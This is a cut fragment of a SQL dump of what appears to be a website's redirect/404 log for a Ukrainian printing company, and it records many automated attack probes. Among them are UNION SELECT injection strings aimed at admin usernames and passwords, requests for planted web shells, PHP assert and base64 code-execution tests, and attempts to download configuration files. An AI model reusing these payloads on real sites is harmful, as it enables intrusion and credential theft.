20:29:54','0000-00-00 00:00:00',301),(14669,'https://ekvatorprint.com.ua/upload/.082250.php',NULL,'','',2,0,'2019-04-25 20:29:55','0000-00-00 00:00:00',301),(14670,'https://ekvatorprint.com.ua/templates/etads/layout/engine_functions.php',NULL,'','',2,0,'2019-04-25 20:29:55','0000-00-00 00:00:00',301),(14671,'https://ekvatorprint.com.ua/menu/.4e7f3d.php',NULL,'','',2,0,'2019-04-25 20:29:56','0000-00-00 00:00:00',301),(14672,'https://ekvatorprint.com.ua/templates/etads/images/presets/preset1/engine_functions.php',NULL,'','',2,0,'2019-04-25 20:29:56','0000-00-00 00:00:00',301),(14673,'https://ekvatorprint.com.ua/upload/dump.php',NULL,'','',2,0,'2019-04-25 20:29:57','0000-00-00 00:00:00',301),(14674,'https://ekvatorprint.com.ua/statistik/.cca27f.php',NULL,'','',2,0,'2019-04-25 20:29:57','0000-00-00 00:00:00',301),(14675,'https://ekvatorprint.com.ua/js/engine_functions.php',NULL,'','',2,0,'2019-04-25 20:29:58','0000-00-00 00:00:00',301),(14676,'https://ekvatorprint.com.ua/administrator/components/com_menus/models/page.php',NULL,'','',2,0,'2019-04-25 20:29:58','0000-00-00 00:00:00',301),(14677,'https://ekvatorprint.com.ua/modules/mod_ariimageslidersa/ws.php',NULL,'','',2,0,'2019-04-25 20:29:59','0000-00-00 00:00:00',301),(14678,'https://ekvatorprint.com.ua/libraries/joomla/document/html/renderer/post_controller.php',NULL,'','',2,0,'2019-04-25 20:29:59','0000-00-00 00:00:00',301),(14679,'https://ekvatorprint.com.ua/modules/mod_ariimagesliderer/footer_menu.php',NULL,'','',2,0,'2019-04-25 20:30:00','0000-00-00 00:00:00',301),(14680,'https://ekvatorprint.com.ua/wp-inc.php',NULL,'','',10,0,'2019-04-25 20:30:00','0000-00-00 00:00:00',301),(14681,'https://ekvatorprint.com.ua/templates/beez_20/global.php',NULL,'','',2,0,'2019-04-25 20:30:02','0000-00-00 00:00:00',301),(14682,'https://ekvatorprint.com.ua/links.php',NULL,'','',2,0,'2019-04-25 20:30:02','0000-00-00 00:00:00',301),(14683,'https://ekvatorprint.com.ua/media/checkpack.php',NULL,'','',2,0,'2019-04-25 20:30:04','0000-00-00 00:00:00',301),(14684,'https://ekvatorprint.com.ua/components/com_banners/helpers/css.php',NULL,'','',2,0,'2019-04-25 20:30:05','0000-00-00 00:00:00',301),(14685,'https://ekvatorprint.com.ua/administrator/components/com_admin/helpers.php',NULL,'','',2,0,'2019-04-25 20:30:05','0000-00-00 00:00:00',301),(14686,'https://ekvatorprint.com.ua/administrator/components/com_zoo/models/caches.php',NULL,'','',2,0,'2019-04-25 20:30:06','0000-00-00 00:00:00',301),(14687,'https://ekvatorprint.com.ua/administrator/backups/content_v_2.0.9.php',NULL,'','',2,0,'2019-04-25 20:30:06','0000-00-00 00:00:00',301),(14688,'https://ekvatorprint.com.ua/administrator/components/com_installer/views/languages/tmpl/config.php',NULL,'','',2,0,'2019-04-25 20:30:07','0000-00-00 00:00:00',301),(14689,'https://ekvatorprint.com.ua/tmp/install.css.php',NULL,'','',2,0,'2019-04-25 20:30:07','0000-00-00 00:00:00',301),(14690,'https://ekvatorprint.com.ua/administrator/components/com_templates/tables/modx.php',NULL,'','',4,0,'2019-04-25 20:30:08','0000-00-00 00:00:00',301),(14691,'https://ekvatorprint.com.ua/cache/cws.php',NULL,'','',2,0,'2019-04-25 20:30:08','0000-00-00 00:00:00',301),(14692,'https://ekvatorprint.com.ua/administrator/components/com_banners/banners.html.php',NULL,'','',2,0,'2019-04-25 20:30:09','0000-00-00 00:00:00',301),(14693,'https://ekvatorprint.com.ua/administrator/language/en-gb/content_v_2.0.9.php',NULL,'','',2,0,'2019-04-25 20:30:10','0000-00-00 00:00:00',301),(14694,'https://ekvatorprint.com.ua/administrator/components/com_gantry5/scss/admin/particles/config.php',NULL,'','',2,0,'2019-04-25 20:30:10','0000-00-00 00:00:00',301),(14695,'https://ekvatorprint.com.ua/plugins/content/apismtp/sup_wp.php',NULL,'','',2,0,'2019-04-25 20:30:11','0000-00-00 00:00:00',301),(14696,'https://ekvatorprint.com.ua/media/eswc.php',NULL,'','',2,0,'2019-04-25 20:30:11','0000-00-00 00:00:00',301),(14697,'https://ekvatorprint.com.ua/administrator/components/com_admin/updates.php',NULL,'','',2,0,'2019-04-25 20:30:12','0000-00-00 00:00:00',301),(14698,'https://ekvatorprint.com.ua/templates/beez3/html/com_newsfeeds/categories/config.php',NULL,'','',2,0,'2019-04-25 20:30:12','0000-00-00 00:00:00',301),(14699,'https://ekvatorprint.com.ua/components/com_contact/com_contact.php',NULL,'','',2,0,'2019-04-25 20:30:13','0000-00-00 00:00:00',301),(14700,'https://ekvatorprint.com.ua/modules/mod_araticlws/mod_araticlws.php',NULL,'','',8,0,'2019-04-25 20:30:13','0000-00-00 00:00:00',301),(14701,'https://ekvatorprint.com.ua/libraries/fof/form/field/wp-lang.php',NULL,'','',2,0,'2019-04-25 20:30:14','0000-00-00 00:00:00',301),(14702,'https://ekvatorprint.com.ua/libraries/fof/form/field/wp_angle.php',NULL,'','',2,0,'2019-04-25 20:30:14','0000-00-00 00:00:00',301),(14703,'https://ekvatorprint.com.ua/components/com_weblinks/links.php',NULL,'','',6,0,'2019-04-25 20:30:14','0000-00-00 00:00:00',301),(14704,'https://ekvatorprint.com.ua/components/com_banners/moderator.php',NULL,'','',2,0,'2019-04-25 20:30:15','0000-00-00 00:00:00',301),(14705,'https://ekvatorprint.com.ua/xupx/db.php',NULL,'','',2,0,'2019-04-25 20:30:16','0000-00-00 00:00:00',301),(14706,'https://ekvatorprint.com.ua/plugins/system/anticopy/anticopy.php',NULL,'','',2,0,'2019-04-25 20:30:16','0000-00-00 00:00:00',301),(14707,'https://ekvatorprint.com.ua/libraries/joomla/github/package/pulls/config.php',NULL,'','',2,0,'2019-04-25 20:30:17','0000-00-00 00:00:00',301),(14708,'https://ekvatorprint.com.ua/images/simple.php',NULL,'','',2,0,'2019-04-25 20:30:17','0000-00-00 00:00:00',301),(14709,'https://ekvatorprint.com.ua/111.php',NULL,'','',2,0,'2019-04-25 20:30:18','0000-00-00 00:00:00',301),(14710,'https://ekvatorprint.com.ua/js/flash/_cache.php',NULL,'','',2,0,'2019-04-25 20:30:18','0000-00-00 00:00:00',301),(14711,'https://ekvatorprint.com.ua/plugins/system/anticopy/debug.php',NULL,'','',2,0,'2019-04-25 20:30:19','0000-00-00 00:00:00',301),(14712,'https://ekvatorprint.com.ua/modules/mod_system/mod_system.php',NULL,'','',1,0,'2019-04-26 00:20:55','0000-00-00 00:00:00',301),(14713,'https://ekvatorprint.com.ua/w1fwmdkn55',NULL,'','',1,0,'2019-04-26 06:10:13','0000-00-00 00:00:00',301),(14714,'https://ekvatorprint.com.ua/modules/vtemslideshow/uploadimage.php',NULL,'http://ekvatorprint.com.ua/modules/vtemslideshow/uploadimage.php','',1,0,'2019-04-26 19:26:49','0000-00-00 00:00:00',301),(14715,'https://ekvatorprint.com.ua/index.php?option=com_content&view=article&id=16&itemid=17',NULL,'','',4,0,'2019-04-26 20:16:48','0000-00-00 00:00:00',301),(14716,'https://ekvatorprint.com.ua/tmp/mod_config.php',NULL,'','',2,0,'2019-04-27 10:00:55','0000-00-00 00:00:00',301),(14717,'https://ekvatorprint.com.ua/administrator/components/com_simplephotogallery/lib/uploadfile.php',NULL,'http://ekvatorprint.com.ua/administrator/components/com_simplephotogallery/lib/uploadFile.php','',12,0,'2019-04-28 11:50:55','0000-00-00 00:00:00',301),(14718,'http://ekvatorprint.com.ua/wp-content/plugins/yellow-pencil-visual-theme-customizer/css/frame.css',NULL,'','',1,0,'2019-04-28 22:01:16','0000-00-00 00:00:00',301),(14719,'http://ekvatorprint.com.ua/images/thumbnails/images/stories/xolst-fill.jpg',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-04-29 13:58:03','0000-00-00 00:00:00',301),(14720,'https://ekvatorprint.com.ua/components/com_sexycontactform/fileupload/index.php',NULL,'http://ekvatorprint.com.ua/components/com_sexycontactform/fileupload/index.php','',11,0,'2019-05-01 03:51:42','0000-00-00 00:00:00',301),(14721,'https://ekvatorprint.com.ua/index.php?option=com_content&view=article&id=5&itemid=6',NULL,'','',2,0,'2019-05-01 05:59:12','0000-00-00 00:00:00',301),(14722,'https://ekvatorprint.com.ua/index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=24+limit+0,1--+a',NULL,'','',2,0,'2019-05-01 12:43:34','0000-00-00 00:00:00',301),(14723,'https://ekvatorprint.com.ua/index.php?option=com_tag&task=tag&lang=es&tag=999999.9\'+union+all+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e)+from+jos_users+where+gid=25+limit+0,1--+a',NULL,'','',2,0,'2019-05-01 12:43:38','0000-00-00 00:00:00',301),(14724,'https://ekvatorprint.com.ua/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=24+limit+0,1--',NULL,'','',2,0,'2019-05-02 06:26:15','0000-00-00 00:00:00',301),(14725,'https://ekvatorprint.com.ua/index.php?option=com_ignitegallery&task=view&gallery=-1+union+select+1,2,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),4,5,6,7,8,9,10+from+jos_users+where+gid=25+limit+0,1--',NULL,'','',2,0,'2019-05-02 06:26:20','0000-00-00 00:00:00',301),(14726,'https://ekvatorprint.com.ua/index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=24+limit+0,1--+;',NULL,'','',2,0,'2019-05-02 08:01:35','0000-00-00 00:00:00',301),(14727,'https://ekvatorprint.com.ua/index.php?option=com_kunena&func=userlist&search=\'+and+1=2)+union+select+1,concat(0x3c757365723e,username,0x3c757365723e3c706173733e,password,0x3c706173733e),3,4,5,6,7,8,9,10,11,12,13,14,15+from+jos_users+where+gid=25+limit+0,1--+;',NULL,'','',2,0,'2019-05-02 08:01:39','0000-00-00 00:00:00',301),(14728,'https://ekvatorprint.com.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=tgyijk',NULL,'','',8,0,'2019-05-03 00:40:47','0000-00-00 00:00:00',301),(14729,'https://ekvatorprint.com.ua/modules/mod_feed/tmpl/mod_feed.php?ms-load=yjk5hg',NULL,'','',7,0,'2019-05-03 01:39:37','0000-00-00 00:00:00',301),(14730,'https://ekvatorprint.com.ua/banner-<fyth ghj,ecrftn cdtn',NULL,'','',1,0,'2019-05-03 19:03:23','0000-00-00 00:00:00',301),(14731,'https://ekvatorprint.com.ua/feed',NULL,'http://ekvatorprint.com.ua/feed','',27,0,'2019-05-03 19:27:40','0000-00-00 00:00:00',301),(14732,'https://ekvatorprint.com.ua/rss',NULL,'http://ekvatorprint.com.ua/rss','',23,0,'2019-05-03 19:27:40','0000-00-00 00:00:00',301),(14733,'https://ekvatorprint.com.ua/atom',NULL,'http://ekvatorprint.com.ua/atom','',1,0,'2019-05-03 19:27:40','0000-00-00 00:00:00',301),(14734,'https://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&itemid=0',NULL,'http://ekvatorprint.com.ua/index.php?option=com_fabrik&c=import&view=import&fietype=csv&tableid=0&Itemid=0','',1,0,'2019-05-05 06:54:40','0000-00-00 00:00:00',301),(14735,'https://ekvatorprint.com.ua/zt9j8pgxaxrcpyj',NULL,'','',1,0,'2019-05-05 09:08:15','0000-00-00 00:00:00',301),(14736,'https://ekvatorprint.com.ua/store/',NULL,'','',6,0,'2019-05-05 14:07:30','0000-00-00 00:00:00',301),(14737,'https://ekvatorprint.com.ua/shop/',NULL,'','',7,0,'2019-05-05 14:07:38','0000-00-00 00:00:00',301),(14738,'https://ekvatorprint.com.ua/catalog/',NULL,'','',6,0,'2019-05-05 14:07:44','0000-00-00 00:00:00',301),(14739,'https://ekvatorprint.com.ua/cart/',NULL,'','',6,0,'2019-05-05 14:07:51','0000-00-00 00:00:00',301),(14740,'https://ekvatorprint.com.ua/browserconfig.xml',NULL,'','',11,0,'2019-05-05 15:56:58','0000-00-00 00:00:00',301),(14741,'https://ekvatorprint.com.ua/index.php?option=com_jifile&task=filesystem.download&filename=configuration.php&lang=en',NULL,'','',1,0,'2019-05-06 03:12:56','0000-00-00 00:00:00',301),(14742,'https://ekvatorprint.com.ua/var/log/maillog',NULL,'','',1,0,'2019-05-07 10:31:49','0000-00-00 00:00:00',301),(14743,'https://ekvatorprint.com.ua/var/importexport/customer.csv',NULL,'','',1,0,'2019-05-07 10:31:49','0000-00-00 00:00:00',301),(14744,'https://ekvatorprint.com.ua/var/export/export_all_products_occ.csv',NULL,'','',1,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14745,'https://ekvatorprint.com.ua/var/log/payment_paypal_standard.log',NULL,'','',1,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14746,'https://ekvatorprint.com.ua/var/export/export_product_occ.csv',NULL,'','',1,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14747,'https://ekvatorprint.com.ua/var/backups/',NULL,'','',2,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14748,'https://ekvatorprint.com.ua/var/export/export_all_products.csv',NULL,'','',1,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14749,'https://ekvatorprint.com.ua/var/spool/mail/gregg',NULL,'','',1,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14750,'https://ekvatorprint.com.ua/var/export/export_product.csv',NULL,'','',1,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14751,'https://ekvatorprint.com.ua/var/export/',NULL,'','',1,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14752,'https://ekvatorprint.com.ua/var/log/payment_hosted_pro.log',NULL,'','',1,0,'2019-05-07 10:31:50','0000-00-00 00:00:00',301),(14753,'https://ekvatorprint.com.ua/var/export/export_product_stocks.csv',NULL,'','',1,0,'2019-05-07 10:31:51','0000-00-00 00:00:00',301),(14754,'https://ekvatorprint.com.ua/var/export/export_all_products_seashepherd.csv',NULL,'','',1,0,'2019-05-07 10:31:51','0000-00-00 00:00:00',301),(14755,'https://ekvatorprint.com.ua/var/export/export_customers.csv',NULL,'','',1,0,'2019-05-07 10:31:51','0000-00-00 00:00:00',301),(14756,'https://ekvatorprint.com.ua/var/export/exported_orders.csv',NULL,'','',1,0,'2019-05-07 10:31:51','0000-00-00 00:00:00',301),(14757,'https://ekvatorprint.com.ua/var/log/aschroder_smtppro.log',NULL,'','',1,0,'2019-05-07 10:31:51','0000-00-00 00:00:00',301),(14758,'https://ekvatorprint.com.ua/index.php?option=com_kunena',NULL,'','',30,0,'2019-05-07 14:52:17','0000-00-00 00:00:00',301),(14759,'https://ekvatorprint.com.ua/administrator/administrator.php',NULL,'','',5,0,'2019-05-07 17:24:33','0000-00-00 00:00:00',301),(14760,'https://ekvatorprint.com.ua/kak-podtverdit-oplaty-za-zakaz',NULL,'','',1,0,'2019-05-07 18:35:45','0000-00-00 00:00:00',301),(14761,'https://ekvatorprint.com.ua/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/cameleon/includes/fileuploader/upload_handler.php','',1,0,'2019-05-08 05:31:35','0000-00-00 00:00:00',301),(14762,'https://ekvatorprint.com.ua/printing-in-dnepropetrovsk/',NULL,'https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d2565.282835701581!2d36.259719541926216!3d49.98730655408041!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x4127a08178976329%3A0x929eb43a56a79a77!2z0KjQuNGA0L7QutC-0YTQvtGA0LzQsNGC0L3QsNGPINC_0LXRh9Cw0YLRjCDQrdC60LLQsNGC0L7RgNCf0YDQuNC90YI!5e0!3m2!1sru!2sua!4v1530615213192','',56,0,'2019-05-08 08:20:10','0000-00-00 00:00:00',301),(14763,'https://ekvatorprint.com.ua/printing-in-kyiv/',NULL,'https://ekvatorprint.com.ua/printing-in-dnepropetrovsk/','',86,0,'2019-05-08 08:20:10','0000-00-00 00:00:00',301),(14764,'https://ekvatorprint.com.ua/printing-in-odessa/',NULL,'https://www.youtube.com/embed/KbMdSqMLzuU','',33,0,'2019-05-08 08:20:11','0000-00-00 00:00:00',301),(14765,'https://ekvatorprint.com.ua/printing-in-kharkov/',NULL,'https://ekvatorprint.com.ua/printing-in-odessa/','',66,0,'2019-05-08 08:20:11','0000-00-00 00:00:00',301),(14766,'https://ekvatorprint.com.ua/printing-in-zaporozhje/',NULL,'https://ekvatorprint.com.ua/internet-katalog-modulnykh-kartin','',60,0,'2019-05-08 08:20:12','0000-00-00 00:00:00',301),(14767,'https://ekvatorprint.com.ua/printing-in-zaporozhje',NULL,'','',206,0,'2019-05-08 08:20:18','0000-00-00 00:00:00',301),(14768,'https://ekvatorprint.com.ua/printing-in-dnepropetrovsk',NULL,'http://ekvatorprint.com.ua/printing-in-dnepropetrovsk','',277,0,'2019-05-08 08:20:18','0000-00-00 00:00:00',301),(14769,'https://ekvatorprint.com.ua/printing-in-odessa',NULL,'http://ekvatorprint.com.ua/printing-in-odessa','',195,0,'2019-05-08 08:20:18','0000-00-00 00:00:00',301),(14770,'https://ekvatorprint.com.ua/printing-in-kharkov',NULL,'http://ekvatorprint.com.ua/printing-in-kharkov','',404,0,'2019-05-08 08:20:18','0000-00-00 00:00:00',301),(14771,'https://ekvatorprint.com.ua/printing-in-kyiv',NULL,'http://ekvatorprint.com.ua/component/contact/contact/1','',102,0,'2019-05-08 08:20:18','0000-00-00 00:00:00',301),(14772,'http://ekvatorprint.com.ua/assets/core-baa171e9e3c768ce518258054e5b8796.css',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14773,'http://ekvatorprint.com.ua/assets/app-e30c9d709709a65def9eed9ff736790c.css',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14774,'http://ekvatorprint.com.ua/assets/core-9318ec4b3fde0075df71363534ae903c.js',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14775,'http://ekvatorprint.com.ua/assets/dc5fd74b/yii.validation.js',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14776,'http://ekvatorprint.com.ua/assets/dc5fd74b/yii.activeform.js',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14777,'http://ekvatorprint.com.ua/images/features-and-editions/testimonial-01.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14778,'http://ekvatorprint.com.ua/images/features-and-editions/testimonial-02.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14779,'http://ekvatorprint.com.ua/images/features-and-editions/testimonial-03.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14780,'http://ekvatorprint.com.ua/images/features-and-editions/sprite-icons.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14781,'http://ekvatorprint.com.ua/images/features-and-editions/clients.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14782,'http://ekvatorprint.com.ua/themes/basic/images/widgets/clients.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14783,'http://ekvatorprint.com.ua/themes/basic/js/gtm-ga-checker.js',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14784,'http://ekvatorprint.com.ua/assets/app-5b3390d65bba8b2dc399f87020f96460.js',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14785,'http://ekvatorprint.com.ua/assets/85e5c2dd/js/order.js',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14786,'https://ekvatorprint.com.ua/support/visitor/index.php?/livechat/html/htmlbuttonbase',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:17','0000-00-00 00:00:00',301),(14787,'http://ekvatorprint.com.ua/images/features-and-editions/pro.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:18','0000-00-00 00:00:00',301),(14788,'http://ekvatorprint.com.ua/images/features-and-editions/free.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:18','0000-00-00 00:00:00',301),(14789,'http://ekvatorprint.com.ua/images/features-and-editions/ent.png',NULL,'https://ekvatorprint.com.ua/','',1,0,'2019-05-08 12:21:18','0000-00-00 00:00:00',301),(14790,'https://ekvatorprint.com.ua/admin/',NULL,'http://ekvatorprint.com.ua/admin/','',65,0,'2019-05-09 15:01:58','0000-00-00 00:00:00',301),(14791,'https://ekvatorprint.com.ua/downloader/',NULL,'http://ekvatorprint.com.ua/downloader/','',4,0,'2019-05-09 15:02:00','0000-00-00 00:00:00',301),(14792,'https://ekvatorprint.com.ua/rss/catalog/notifystock/',NULL,'http://ekvatorprint.com.ua/rss/catalog/notifystock/','',4,0,'2019-05-09 15:02:01','0000-00-00 00:00:00',301),(14793,'https://ekvatorprint.com.ua/rss/order/new/',NULL,'http://ekvatorprint.com.ua/rss/order/new/','',4,0,'2019-05-09 15:02:03','0000-00-00 00:00:00',301),(14794,'https://ekvatorprint.com.ua/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php',NULL,'http://ekvatorprint.com.ua/wp-content/themes/evolve/js/back-end/libraries/fileuploader/upload_handler.php','',1,0,'2019-05-09 18:38:45','0000-00-00 00:00:00',301),(14795,'https://ekvatorprint.com.ua/images/defau1t.php',NULL,'','',6,0,'2019-05-10 18:13:06','0000-00-00 00:00:00',301),(14796,'https://ekvatorprint.com.ua/post-a-job/',NULL,'http://ekvatorprint.com.ua/post-a-job/','',1,0,'2019-05-11 04:25:13','0000-00-00 00:00:00',301),(14797,'https://ekvatorprint.com.ua/wp/wp-login.php',NULL,'http://ekvatorprint.com.ua/wp/wp-login.php','',102,0,'2019-05-11 10:45:04','0000-00-00 00:00:00',301),(14798,'https://ekvatorprint.com.ua/cms/wp-login.php',NULL,'http://ekvatorprint.com.ua/cms/wp-login.php','',14,0,'2019-05-11 15:32:25','0000-00-00 00:00:00',301),(14799,'https://ekvatorprint.com.ua/wp-content/uploads/levoslideshow/1_uploadfolder/big/',NULL,'http://ekvatorprint.com.ua/wp-content/uploads/levoslideshow/1_uploadfolder/big/','',1,0,'2019-05-12 13:19:57','0000-00-00 00:00:00',301),(14800,'https://ekvatorprint.com.ua/wp-sbb.php',NULL,'','',7,0,'2019-05-13 06:12:14','0000-00-00 00:00:00',301),(14801,'https://ekvatorprint.com.ua/ytt.php',NULL,'','',6,0,'2019-05-13 17:59:00','0000-00-00 00:00:00',301),(14802,'https://ekvatorprint.com.ua/theme/assets/global/plugins/jquery-file-upload/server/php/',NULL,'http://ekvatorprint.com.ua/theme/assets/global/plugins/jquery-file-upload/server/php/','',3,0,'2019-05-13 18:41:05','0000-00-00 00:00:00',301),(14803,'https://ekvatorprint.com.ua/yt2.php',NULL,'','',6,0,'2019-05-14 06:13:56','0000-00-00 00:00:00',301),(14804,'https://ekvatorprint.com.ua/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/upload.php',NULL,'','',1,0,'2019-05-14 11:55:09','0000-00-00 00:00:00',301),(14805,'https://ekvatorprint.com.ua/templates/protostar/js/templatedetails.php',NULL,'','',6,0,'2019-05-14 13:34:03','0000-00-00 00:00:00',301),(14806,'https://ekvatorprint.com.ua/media/media.php?1=assert&2=die(pi()*42);',NULL,'','',4,0,'2019-05-14 13:34:05','0000-00-00 00:00:00',301),(14807,'https://ekvatorprint.com.ua/upload/server/php/',NULL,'http://ekvatorprint.com.ua/upload/server/php/','',3,0,'2019-05-15 01:13:43','0000-00-00 00:00:00',301),(14808,'https://ekvatorprint.com.ua/administrator/components/com_virtuemart/virtuemart.xml',NULL,'','',1,0,'2019-05-15 04:22:26','0000-00-00 00:00:00',301),(14809,'https://ekvatorprint.com.ua/wp-logos.php',NULL,'','',6,0,'2019-05-15 10:28:16','0000-00-00 00:00:00',301),(14810,'http://ekvatorprint.com.ua/https://ekvatorprint.com.ua/images/oplata_za_zakaz/vze yslygi_arhiv.jpg',NULL,'','',8,0,'2019-05-15 11:10:00','0000-00-00 00:00:00',301),(14811,'https://ekvatorprint.com.ua/?option=com_content((\'.,.&view=article&id=7&itemid=8',NULL,'','',1,0,'2019-05-15 21:35:16','0000-00-00 00:00:00',301),(14812,'https://ekvatorprint.com.ua/images/readmes.php',NULL,'','',6,0,'2019-05-16 00:42:31','0000-00-00 00:00:00',301),(14813,'https://ekvatorprint.com.ua/admin/index.php?route=common/login',NULL,'','',6,0,'2019-05-16 02:05:05','0000-00-00 00:00:00',301),(14814,'https://ekvatorprint.com.ua/cod.php',NULL,'','',6,0,'2019-05-16 17:56:51','0000-00-00 00:00:00',301),(14815,'https://ekvatorprint.com.ua/jobs',NULL,'','',3,0,'2019-05-16 18:21:49','0000-00-00 00:00:00',301),(14816,'https://ekvatorprint.com.ua/wp-content/plugins/reflex-gallery/admin/scripts/fileuploader/php.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php','',2,0,'2019-05-16 18:29:23','0000-00-00 00:00:00',301),(14817,'https://ekvatorprint.com.ua/wp-feed.php',NULL,'','',6,0,'2019-05-17 08:26:14','0000-00-00 00:00:00',301),(14818,'https://ekvatorprint.com.ua/wp-cahce.php',NULL,'','',6,0,'2019-05-17 15:50:14','0000-00-00 00:00:00',301),(14819,'https://ekvatorprint.com.ua/http:/brukstone-kwidzyn.pl/wp-content/plugins/photo-gallery/filemanager/uploadhandler.php',NULL,'http://ekvatorprint.com.ua/http://brukstone-kwidzyn.pl/wp-content/plugins/photo-gallery/filemanager/UploadHandler.php','',1,0,'2019-05-17 16:54:00','0000-00-00 00:00:00',301),(14820,'https://ekvatorprint.com.ua/yt.php',NULL,'','',6,0,'2019-05-17 22:09:55','0000-00-00 00:00:00',301),(14821,'https://ekvatorprint.com.ua/admin',NULL,'','',122,0,'2019-05-18 07:59:40','0000-00-00 00:00:00',301),(14822,'https://ekvatorprint.com.ua/tmp.php',NULL,'','',5,0,'2019-05-18 10:14:57','0000-00-00 00:00:00',301),(14823,'https://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/formcraft/file-upload/server/php/upload.php','',2,0,'2019-05-18 15:51:56','0000-00-00 00:00:00',301),(14824,'https://ekvatorprint.com.ua/libraries/libraries.php',NULL,'','',6,0,'2019-05-20 05:31:48','0000-00-00 00:00:00',301),(14825,'https://ekvatorprint.com.ua/license.php?x=1',NULL,'','',1,0,'2019-05-20 05:32:08','0000-00-00 00:00:00',301),(14826,'https://ekvatorprint.com.ua/wp-content/plugins/wp-easy-gallery-pro/admin/php.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/wp-easy-gallery-pro/admin/php.php','',3,0,'2019-05-20 08:40:19','0000-00-00 00:00:00',301),(14827,'https://ekvatorprint.com.ua/wp-installation.php',NULL,'','',6,0,'2019-05-20 12:28:57','0000-00-00 00:00:00',301),(14828,'https://ekvatorprint.com.ua/app/etc/local.xml',NULL,'','',6,0,'2019-05-20 22:52:49','0000-00-00 00:00:00',301),(14829,'https://ekvatorprint.com.ua/wp-rdf.php',NULL,'','',6,0,'2019-05-21 13:52:05','0000-00-00 00:00:00',301),(14830,'https://ekvatorprint.com.ua/backups.php?mode=config&key=c6y1f2ea7217pbtl1flch98sopfo/r1z76/okfae',NULL,'','',3,0,'2019-05-22 10:37:11','0000-00-00 00:00:00',301),(14831,'https://ekvatorprint.com.ua/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',1,0,'2019-05-23 06:06:45','0000-00-00 00:00:00',301),(14832,'https://ekvatorprint.com.ua/cache/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',1,0,'2019-05-23 06:07:02','0000-00-00 00:00:00',301),(14833,'https://ekvatorprint.com.ua/plugins/system/.index.php?xo=echo(base64_decode(\'ywr6b250awxvc2e=\'));',NULL,'','',1,0,'2019-05-23 06:07:21','0000-00-00 00:00:00',301),(14834,'https://ekvatorprint.com.ua/index.php?option=com_k2&view=item&id=1',NULL,'','',1,0,'2019-05-23 07:18:59','0000-00-00 00:00:00',301),(14835,'https://ekvatorprint.com.ua/modules/mod_artuploader/upload.php',NULL,'http://ekvatorprint.com.ua/modules/mod_artuploader/upload.php','',2,0,'2019-05-23 07:49:21','0000-00-00 00:00:00',301),(14836,'https://ekvatorprint.com.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php',NULL,'http://ekvatorprint.com.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php','',1,0,'2019-05-23 